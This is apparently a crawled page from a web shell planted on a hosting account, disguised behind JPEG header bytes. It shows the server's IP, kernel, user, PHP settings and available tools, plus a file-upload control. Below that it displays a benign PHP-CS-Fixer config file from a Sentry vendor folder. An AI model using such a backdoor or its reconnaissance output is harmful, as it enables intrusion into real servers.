����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.15.190.49 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/public_html/vendor/sentry/sentry/ |
Upload File : |
<?php return PhpCsFixer\Config::create() ->setRules([ '@PSR2' => true, '@Symfony' => true, '@Symfony:risky' => true, 'array_syntax' => ['syntax' => 'short'], 'concat_space' => ['spacing' => 'one'], 'ordered_imports' => [ 'imports_order' => ['class', 'function', 'const'], ], 'declare_strict_types' => true, 'psr0' => true, 'psr4' => true, 'random_api_migration' => true, 'yoda_style' => true, 'self_accessor' => false, 'phpdoc_no_useless_inheritdoc' => false, 'phpdoc_to_comment' => false, 'phpdoc_align' => [ 'tags' => ['param', 'return', 'throws', 'type', 'var'], ], 'phpdoc_line_span' => [ 'const' => 'multi', 'method' => 'multi', 'property' => 'multi', ], ]) ->setRiskyAllowed(true) ->setFinder( PhpCsFixer\Finder::create() ->in(__DIR__) ->exclude([ 'tests/resources', 'tests/phpt', 'tests/Fixtures', ]) ) ;